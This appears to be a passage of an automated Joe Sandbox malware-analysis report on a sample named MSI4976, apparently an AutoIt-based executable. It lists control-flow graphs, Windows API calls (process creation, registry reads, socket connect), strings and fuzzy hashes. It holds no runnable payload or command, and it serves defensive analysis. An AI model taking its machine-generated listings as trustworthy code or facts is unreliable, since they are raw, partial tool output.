1537->1479 1537->1511 1540->1540 1540->1541 1562 38272c-38274a call 34017e * 3 1541->1562 1563 382725-38272a 1541->1563 1542->1548 1550 382819-382838 call 332570 CloseHandle 1543->1550 1551 382813 1543->1551 1550->1548 1551->1550 1562->1508 1563->1562 1563->1563
                                        APIs
                                        • _memset.LIBCMT ref: 003823E6
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00382579
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0038259D
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003825DD
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003825FF
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00382760
                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00382792
                                        • CloseHandle.KERNEL32(?), ref: 003827C1
                                        • CloseHandle.KERNEL32(?), ref: 00382838
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                        • String ID:
                                        • API String ID: 4090791747-0
                                        • Opcode ID: 0956fe54a6d03538fbdc86b3a32f4bb0ec954244d43a9c1c9851ac84f2727b74
                                        • Instruction ID: b6dfe901d86f0d829bbb68f44c2d0e41c3624e9454278e5d22c8ab2fb1eef46b
                                        • Opcode Fuzzy Hash: 0956fe54a6d03538fbdc86b3a32f4bb0ec954244d43a9c1c9851ac84f2727b74
                                        • Instruction Fuzzy Hash: E0D1A035604301DFCB16EF25D891B6ABBE5AF85310F15889DF8899F2A2DB70EC41CB52
                                        Function 0037C8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1572 37c8b7-37c8f1 1573 37c8f7-37c8fa 1572->1573 1574 37ccfb-37ccff 1572->1574 1573->1574 1576 37c900-37c903 1573->1576 1575 37cd04-37cd05 1574->1575 1577 37cd06 call 37c235 1575->1577 1576->1574 1578 37c909-37c912 call 37cff8 1576->1578 1581 37cd0b-37cd0f 1577->1581 1583 37c925-37c92e call 36be14 1578->1583 1584 37c914-37c920 1578->1584 1587 37c934-37c93a 1583->1587 1588 37cc61-37cc6c call 32d2c0 1583->1588 1584->1577 1589 37c940 1587->1589 1590 37c93c-37c93e 1587->1590 1596 37cc6e-37cc72 1588->1596 1597 37cca9-37ccb4 call 32d2c0 1588->1597 1592 37c942-37c94a 1589->1592 1590->1592 1594 37c950-37c967 call 35abf3 1592->1594 1595 37ccec-37ccf4 1592->1595 1606 37c973-37c97f 1594->1606 1607 37c969-37c96e 1594->1607 1595->1574 1600 37cc74-37cc76 1596->1600 1601 37cc78 1596->1601 1597->1595 1605 37ccb6-37ccba 1597->1605 1604 37cc7a-37cc98 call 33d6b4 call 3697b6 1600->1604 1601->1604 1626 37cc99-37cca7 call 36d7e4 1604->1626 1609 37ccc0 1605->1609 1610 37ccbc-37ccbe 1605->1610 1611 37c981-37c98d 1606->1611 1612 37c9ce-37c9f9 call 33fa89 1606->1612 1607->1575 1615 37ccc2-37ccea call 33d6b4 call 36503c call 332570 1609->1615 1610->1615 1611->1612 1616 37c98f-37c99c call 35a8c8 1611->1616 1622 37c9fb-37ca16 call 33ac65 1612->1622 1623 37ca18-37ca1a 1612->1623 1615->1626 1625 37c9a1-37c9a6 1616->1625 1628 37ca1d-37ca24 1622->1628 1623->1628 1625->1612 1630 37c9a8-37c9af 1625->1630 1626->1581 1634 37ca26-37ca30 1628->1634 1635 37ca52-37ca59 1628->1635 1637 37c9b1-37c9b8 1630->1637 1638 37c9be-37c9c5 1630->1638 1642 37ca32-37ca48 call 35a25b 1634->1642 1639 37cadf-37caec 1635->1639 1640 37ca5f-37ca66 1635->1640 1637->1638 1644 37c9ba 1637->1644 1638->1612 1641 37c9c7 1638->1641 1646 37caee-37caf8 1639->1646 1647 37cafb-37cb28 VariantInit call 341970 1639->1647 1640->1639 1645 37ca68-37ca7b 1640->1645 1641->1612 1656 37ca4a-37ca50 1642->1656 1644->1638 1650 37ca7c-37ca84 1645->1650 1646->1647 1660 37cb2d-37cb30 1647->1660 1661 37cb2a-37cb2b 1647->1661 1653 37ca86-37caa3 VariantClear 1650->1653 1654 37cad1-37cada 1650->1654 1657 37caa5-37cab9 SysAllocString 1653->1657 1658 37cabc-37cacc 1653->1658 1654->1650 1659 37cadc 1654->1659 1656->1635 1657->1658 1658->1654 1663 37cace 1658->1663 1659->1639 1662 37cb31-37cb43 1660->1662 1661->1662 1664 37cb47-37cb4c 1662->1664 1663->1654 1665 37cb4e-37cb52 1664->1665 1666 37cb8a-37cb8c 1664->1666 1667 37cb54-37cb86 1665->1667 1668 37cba1-37cba5 1665->1668 1669 37cbb4-37cbd5 call 36d7e4 call 36a6f6 1666->1669 1670 37cb8e-37cb95 1666->1670 1667->1666 1672 37cba6-37cbaf call 37c235 1668->1672 1679 37cc41-37cc50 VariantClear 1669->1679 1682 37cbd7-37cbe0 1669->1682 1670->1668 1671 37cb97-37cb9f 1670->1671 1671->1672 1672->1679 1680 37cc52-37cc55 call 361693 1679->1680 1681 37cc5a-37cc5c 1679->1681 1680->1681 1681->1581 1684 37cbe2-37cbef 1682->1684 1685 37cbf1-37cbf8 1684->1685 1686 37cc38-37cc3f 1684->1686 1687 37cc26-37cc2a 1685->1687 1688 37cbfa-37cc0a 1685->1688 1686->1679 1686->1684 1690 37cc30 1687->1690 1691 37cc2c-37cc2e 1687->1691 1688->1686 1689 37cc0c-37cc14 1688->1689 1689->1687 1692 37cc16-37cc1c 1689->1692 1693 37cc32-37cc33 call 36a6f6 1690->1693 1691->1693 1692->1687 1694 37cc1e-37cc24 1692->1694 1693->1686 1694->1686 1694->1687
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: NULL Pointer assignment$Not an Object type
                                        • API String ID: 0-572801152
                                        • Opcode ID: 19385a54923d97f54e4f70e7748cce87194c7eae7cc5b276d693f1be2f398ff4
                                        • Instruction ID: 916198092bb41541536a5494b9cb761a8bd9995b139c1fd56254e0e389fcbd0f
                                        • Opcode Fuzzy Hash: 19385a54923d97f54e4f70e7748cce87194c7eae7cc5b276d693f1be2f398ff4
                                        • Instruction Fuzzy Hash: 17E1B171A1021AAFDF22DFA4D881AEE77B9FF48314F15802DF949AB281D7749D41CB90
                                        Function 0037BF80 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1696 37bf80-37bfcd 1697 37bfd9-37bfe1 1696->1697 1698 37bfd4 call 341970 1696->1698 1699 37bfe7-37bfeb 1697->1699 1700 37c21b-37c21d 1697->1700 1698->1697 1699->1700 1701 37bff1-37bff6 1699->1701 1702 37c21e-37c21f 1700->1702 1701->1700 1703 37bffc-37c00b call 36be14 1701->1703 1704 37c224-37c226 1702->1704 1709 37c011-37c015 1703->1709 1710 37c158-37c15c 1703->1710 1705 37c227 1704->1705 1708 37c229 call 37c235 1705->1708 1716 37c22e-37c232 1708->1716 1712 37c017-37c019 1709->1712 1713 37c01b 1709->1713 1714 37c15e-37c160 1710->1714 1715 37c16d 1710->1715 1717 37c01d-37c01f 1712->1717 1713->1717 1718 37c16f-37c171 1714->1718 1715->1718 1719 37c033-37c03e 1717->1719 1720 37c021-37c025 1717->1720 1718->1702 1721 37c177-37c17b 1718->1721 1719->1705 1720->1719 1722 37c027-37c031 1720->1722 1723 37c181 1721->1723 1724 37c17d-37c17f 1721->1724 1722->1719 1725 37c043-37c05f 1722->1725 1726 37c183-37c186 1723->1726 1724->1726 1732 37c067-37c081 1725->1732 1733 37c061-37c065 1725->1733 1727 37c193-37c197 1726->1727 1728 37c188-37c18e 1726->1728 1730 37c19d 1727->1730 1731 37c199-37c19b 1727->1731 1728->1704 1734 37c19f-37c1c9 VariantInit VariantClear 1730->1734 1731->1734 1741 37c083-37c087 1732->1741 1742 37c089 1732->1742 1733->1732 1735 37c090-37c0e5 call 33fa89 VariantInit call 341a00 1733->1735 1739 37c1e6-37c1ea 1734->1739 1740 37c1cb-37c1cd 1734->1740 1758 37c0e7-37c0f1 1735->1758 1759 37c108-37c10d 1735->1759 1745 37c1f0-37c1fe call 332570 1739->1745 1746 37c1ec-37c1ee 1739->1746 1740->1739 1744 37c1cf-37c1e1 call 332570 1740->1744 1741->1735 1741->1742 1742->1735 1755 37c0fb-37c0fe 1744->1755 1748 37c201-37c219 call 36a6f6 VariantClear 1745->1748 1746->1745 1746->1748 1748->1716 1755->1708 1760 37c103-37c106 1758->1760 1761 37c0f3-37c0fa 1758->1761 1762 37c162-37c16b 1759->1762 1763 37c10f-37c131 1759->1763 1760->1755 1761->1755 1762->1755 1766 37c133-37c139 1763->1766 1767 37c13b-37c13d 1763->1767 1766->1755 1768 37c141-37c157 call 36a6f6 1767->1768 1768->1710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$_memset
                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                        • API String ID: 2862541840-625585964
                                        • Opcode ID: 323b0df2f94de50a192a94e73dd97d3cf85624f8667bd9adb6f847dd545afc7e
                                        • Instruction ID: 0eb6422d2d3795ca302242483d736d17e86a08e6a8f549386a4a49f0a4fa4ec4
                                        • Opcode Fuzzy Hash: 323b0df2f94de50a192a94e73dd97d3cf85624f8667bd9adb6f847dd545afc7e
                                        • Instruction Fuzzy Hash: E291AD71A10219EBDF26CFA4D844FAEBBB8EF45710F10852DF919AB281D7749941CFA0
                                        Function 00323DCB Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 258COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00323F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003234E2,?,00000001), ref: 00323FCD
                                        • _free.LIBCMT ref: 00393C27
                                        • _free.LIBCMT ref: 00393C6E
                                          • Part of subcall function 0032BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,003E22E8,?,00000000,?,00323E2E,?,00000000,?,003BDBF0,00000000,?), ref: 0032BE8B
                                          • Part of subcall function 0032BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00323E2E,?,00000000,?,003BDBF0,00000000,?,00000002), ref: 0032BEA7
                                          • Part of subcall function 0032BDF0: __wsplitpath.LIBCMT ref: 0032BF19
                                          • Part of subcall function 0032BDF0: _wcscpy.LIBCMT ref: 0032BF31
                                          • Part of subcall function 0032BDF0: _wcscat.LIBCMT ref: 0032BF46
                                          • Part of subcall function 0032BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 0032BF56
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<2$G-2
                                        • API String ID: 1510338132-1910664700
                                        • Opcode ID: 9780d8dccb70ddd06728ccb50b2e2d6828753e3feed2e4c873a2cb70b1336a58
                                        • Instruction ID: 36b2f821747686e7206e3bc19b899673c0c53821d8cc680836bea134bd59625d
                                        • Opcode Fuzzy Hash: 9780d8dccb70ddd06728ccb50b2e2d6828753e3feed2e4c873a2cb70b1336a58
                                        • Instruction Fuzzy Hash: 40915071A10269AFCF06EFA4DC919EEB7B4BF05310F144429F416AF291EB74AE05CB50
                                        Function 0033EB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0033EADA,?,?), ref: 0033EB27
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,0033EADA,?,?), ref: 00394B26
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,0033EADA,?,?), ref: 00394B65
                                        • RegCloseKey.ADVAPI32(?,?,0033EADA,?,?), ref: 00394B94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: QueryValue$CloseOpen
                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                        • API String ID: 1586453840-614718249
                                        • Opcode ID: 7015504bbff8d1cb33aebbbb43aeac614de232f713aeac6d32fc9f4a34c96205
                                        • Instruction ID: 43a24568c21886dd9f74e25314faf8f3303adda22618cbaebb8d03aeb13d05bc
                                        • Opcode Fuzzy Hash: 7015504bbff8d1cb33aebbbb43aeac614de232f713aeac6d32fc9f4a34c96205
                                        • Instruction Fuzzy Hash: 08114F71600118BEEB06DBA4DD86EFF77BCEF04358F100055F606E6190EA709E01DB50
                                        Function 00322E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00322ECB
                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00322EEC
                                        • ShowWindow.USER32(00000000), ref: 00322F00
                                        • ShowWindow.USER32(00000000), ref: 00322F09
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$CreateShow
                                        • String ID: AutoIt v3$edit
                                        • API String ID: 1584632944-3779509399
                                        • Opcode ID: b45da5f349088e64941c0d61e8f3a039cd56afd8f9e31570e85a77f094e6467d
                                        • Instruction ID: 9310b9b1b745b6d8c9f7ae273c2af6febd571294348a7a849bad03e3627f78d4
                                        • Opcode Fuzzy Hash: b45da5f349088e64941c0d61e8f3a039cd56afd8f9e31570e85a77f094e6467d
                                        • Instruction Fuzzy Hash: 3CF0D0755402D07ADB329B576C88E772E7DD7C7F24F01421EBA059A1B0D5710CD5DA70
                                        Function 00366D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00323B1E: _wcsncpy.LIBCMT ref: 00323B32
                                        • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00366DBA
                                        • GetLastError.KERNEL32 ref: 00366DC5
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00366DD9
                                        • _wcsrchr.LIBCMT ref: 00366DFB
                                          • Part of subcall function 00366D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00366E31
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                        • String ID:
                                        • API String ID: 3633006590-0
                                        • Opcode ID: 988925db24dfd29bf085793f022373e0263fb6f83aee954dbb959900101c6a1f
                                        • Instruction ID: f4268a73b0650792929e40109b8e41007ce20310e0b31987bffbc77e6a847267
                                        • Opcode Fuzzy Hash: 988925db24dfd29bf085793f022373e0263fb6f83aee954dbb959900101c6a1f
                                        • Instruction Fuzzy Hash: EE21E4756013149ADF277B74ED4BBEA33ACCF02390F218556E421CB0D6EF21DE848A64
                                        Function 00379122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0037ACD3: inet_addr.WS2_32(00000000), ref: 0037ACF5
                                        • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00379160
                                        • WSAGetLastError.WS2_32(00000000), ref: 0037916F
                                        • connect.WS2_32(00000000,?,00000010), ref: 0037918B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorLastconnectinet_addrsocket
                                        • String ID:
                                        • API String ID: 3701255441-0
                                        • Opcode ID: 48b8de832a60a391b9e11b39811c0815c32d1d3da48bc8cbbd2386bb5a72886e
                                        • Instruction ID: d491eea201042fd7913ea895e4f38d68657c8f008fca9ae608bdfa7094ece19c
                                        • Opcode Fuzzy Hash: 48b8de832a60a391b9e11b39811c0815c32d1d3da48bc8cbbd2386bb5a72886e
                                        • Instruction Fuzzy Hash: 3D2190312006119FDB16AF68CC8AB6E77ADEF49724F048519F95AAB392CA74EC018B51
                                        Function 0037F79F Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 385COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: dE=
                                        • API String ID: 0-1710837183
                                        • Opcode ID: 5423aeacb7586107c9a9d02b4dead90c57cb540af2ff379064d5ab83bf299258
                                        • Instruction ID: 748ba113d65e8422a42e6e6d6a90e92dbdb99f92c452b844e7b9838eb8df5c60
                                        • Opcode Fuzzy Hash: 5423aeacb7586107c9a9d02b4dead90c57cb540af2ff379064d5ab83bf299258
                                        • Instruction Fuzzy Hash: CBF18C716087019FC722DF28C880B5AB7E5FF88314F10896EF9999B292D735E905CF82
                                        Function 00323A67 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                        • SHGetMalloc.SHELL32(1<2), ref: 00323A7D
                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00323AD2
                                        • SHGetDesktopFolder.SHELL32(?), ref: 00323A8F
                                          • Part of subcall function 00323B1E: _wcsncpy.LIBCMT ref: 00323B32
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                        • String ID: 1<2
                                        • API String ID: 3981382179-1640791754
                                        • Opcode ID: 3e8bd59d1e5eba8a1eebc839eacb5ad41308bd5c501327cffa7db7046a43c6b1
                                        • Instruction ID: 7b52b14edc66c869afd8598ea9bd52b9581069d937b4fc33084487dbd4c4227d
                                        • Opcode Fuzzy Hash: 3e8bd59d1e5eba8a1eebc839eacb5ad41308bd5c501327cffa7db7046a43c6b1
                                        • Instruction Fuzzy Hash: 17215E76B00128ABCB15DF95DC88DEEB7BDEF89700B1040A8F50ADB251DB749E46CB90
                                        Function 0033C955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0033C948,SwapMouseButtons,00000004,?), ref: 0033C979
                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0033C948,SwapMouseButtons,00000004,?,?,?,?,0033BF22), ref: 0033C99A
                                        • RegCloseKey.KERNEL32(00000000,?,?,0033C948,SwapMouseButtons,00000004,?,?,?,?,0033BF22), ref: 0033C9BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: Control Panel\Mouse
